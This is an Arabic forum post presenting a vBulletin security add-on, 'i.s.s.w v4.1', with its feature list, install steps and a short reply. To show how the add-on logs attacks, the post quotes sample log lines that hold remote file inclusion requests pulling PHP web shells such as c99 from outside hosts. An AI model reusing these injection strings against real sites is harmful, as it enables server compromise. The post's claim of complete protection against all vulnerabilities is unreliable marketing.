|
أختيار الاستال من هنا
|
روسيا اليوم | الجزيرة | ناشونال جيوغرافيك | المملكه | رؤيا | الاقصى | الكوفيه | الرياضيه | عمون | يوتيوب | مركز رفع الصور |
هاكات في بي 3.7.0 وأحدث كل ما يخص هاكات وملحقات المنتديات من نوع في بي من إصدار 3.7.0 وأحدث |
كاتب الموضوع | م.محمود الحجاج | مشاركات | 1 | المشاهدات | 7765 | | | | انشر الموضوع |
|
أدوات الموضوع | انواع عرض الموضوع |
02-12-2008, 07:49 | رقم المشاركة : ( 1 ) | ||||||||||||||||
مؤسس الشبكة
|
الحمايه الجبارة للمنتديات حمايه كامله من جميع الثغرات i.s.s.w v4.1
السلام عليكم ورحمة الله وبركاته اسم المنتج : حماية المنتدي i.s.s.w الإصدار : i.s.s.w v 4.1 المبرمجين : الفريق الامني M.M.A i.s.s.w جديد الاصدار : 1:قراءة ملف اللوق لمحاولات الاختراق من لوحت التحكم 2: امكانية التحكم في الصفحة التي تعرض للمخترق 3: اضافه لوحت تحكم مختصره cp vb 4: اضافة اخبار عن ثغرات المنتديات في لوحت التحكم كأختصار 5 : تنبية في التحديث 6: تعديلات في عمل الهاك وتحديثة 7: حماية ملف config.php مع امكانيه اضافه حمايتة مهما تغير المسمى جديد 8: اغلاق ثغره Spacer_Open و Spacer_Close من غير تعديل قوالب جديد 9: تغير نمط الحقوق وحذف الايقونه ووضح كود لتحقق من عدم ازارله الحقوق وهذا من حقنا نطلب الدعاء لنا في التوفيق وثبات الايمان اضافه Spacer_Open و Spacer_Close من M.M.A الفريق الامني عمل الهاك : حماية المنتدى بشكل كامل بعون الله نقره على هذا الشريط لتكبير الصورة الخيار الاول : لتشغيل حمايه المنتدي منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90% حجب عدة مواقع تساعد على العبث في المنتديات تطوير للدوال القديمة للتوافق معه السيرفر منع اكثر اوامر اليونكس وحيل الحقن في الشيل اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك :1 (79): الخيار الثاني : منع اكواد التحويل لاخر عشر مواضيع والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع الان نأتي للقسم الاكثر اثارة للموضوع عند دخولك مجلد sec افتح الملف logfile_hacker.txt ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل كود PHP 2007-12-11, 05:50:44, 1197370244, 209.67.223.188, p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808 2007-12-11, 06:32:22, 1197372742, 203.211.135.147, t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808 2007-12-11, 07:09:46, 1197374986, 211.157.108.187, p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79 2007-12-11, 09:15:08, 1197382508, 200.102.138.66, t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library) الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر طبعا الفاصلة تفصل بين كل معلومه ومعلومة كود PHP , التاريخ والوقت كود PHP 2007-12-11, 05:50:44, عدد المحاولات كود PHP 1197370244 ايبي الموقع المصااب كود PHP 209.67.223.188 الاصابة طبعا تشفرت لاغراض امنيه كود PHP p=11575//codebb/lang_select الاستغلال كود PHP ?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt? نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه كود PHP libwww-perl/5.808 الان شرح التركيب امسح جميع هاكات لها علاقه في الحمايه او منع xss اما من ركب هاك الحمايه issw v4.0 issw v3 عليه فقط حذف ملف البرودكت وتركيب المحدث شرح حذف الهاك من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت ومن ثم حذف توابعه --------------------------------------------------------------------------- التركيب لمهم ناتي الى طريقة التثبيت نرفع ما بداخل upload ارفع المجلد sec الى مجلد المنتدي الرئيسي اعطي التصريح 666 counter.txt logfile_hacker.txt وارفع cpnav_issw داخل vb\includes\xml قوم باستدعاء البروديكت من لوحت تحكم المنتدي واتمنى لكم النجاح في التنصيب ملاحظة الهاك يتعارض مع اي هاك حمايه او من هالامور مع تحيات الفريق الامني الان من لوحت تحكم المنتدي قم برفع البرودكت تم تجربت المنتج على الاصدار 3.6.x 3.7.0 لمن لديه اقتراح او تطوير او استفسار او وجد خلل في البرودكت يطرحه هنا في الموضوع لنصل لتطوير اكثر وجل من لا يخطأ وشكرا لكم لتتبع جديد الهاك على الرابط التالي http://www.is-sw.net/index.php?issw=isswvb الحمد لله على كل شيء لابري ذمتي عند نزع الحقوق تحصل مشاكل للقواعد اي تغير في سطر الحقوق وهذا وانا افصح لكم عشان محدا يلومني مثل ماصار فيكم في الاصدار الاسبق اتمنى عدم تركيبه لمواقع اباحيه او مواقع تتوجه لمعادات الاسلام واهل الكتاب السنه وشكرا لكم رابط الموضوع الاصلي http://www.is-sw.net/vb/showthread.php?t=4329 الملفات المرفقة تحذير : يتوجب عليك فحص الملفات للتأكد من خلوها من الفيروسات والمنتدى غير مسؤول عن أي ضرر ينتج عن إستخدام هذا المرفق . تحميل الملف إسم الملف : i.s.s.w v 4.1.zip نوع الملف: zip حجم الملف : 7.6 كيلوبايت المشاهدات : 843 المصدر: شبكة ومنتديات صدى الحجاج |
||||||||||||||||
|
|||||||||||||||||
04-12-2008, 14:04 | رقم المشاركة : ( 2 ) | |||||||||||||
|
رد: الحمايه الجبارة للمنتديات حمايه كامله من جميع الثغرات i.s.s.w v4.1
والله كلام كبير يا ابو معمر بدو وقت حتى نفهمه
بس والله انك كبييييييييييييييييييييييييييييييييير |
|||||||||||||
|
||||||||||||||
الموضوع الحالى: الحمايه الجبارة للمنتديات حمايه كامله من جميع الثغرات i.s.s.w v4.1 -||- القسم الخاص بالموضوع: هاكات في بي 3.7.0 وأحدث -||- المصدر: شبكة ومنتديات صدى الحجاج -||- شبكة صدى الحجاج |
الذين يشاهدون محتوى الموضوع الآن : 3 ( الأعضاء 0 والزوار 3) | |
|
|
المواضيع المتشابهه | ||||
الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
ماذا تعرف عن إتفاقية سيداو ؟ | م.محمود الحجاج | منتدى الاسره وشؤون المرأه | 6 | 23-04-2009 10:55 |
|
عدد الزوار والضيوف المتواجدبن الان على الشبكة من الدول العربيه والاسلاميه والعالميه
انت الزائر رقم
كل ما يكتب في المنتديات لا يعبر بالضرورة عن رأي إدارة شبكة ومنتديات صدى الحجاج
شبكة ومنتديات صدى الحجاج لا تنتمي لاي حزب او جماعه او جهة او معتقد او فئه او
مؤسسة وانما تثمل المصداقيه والكلمه الحرة
...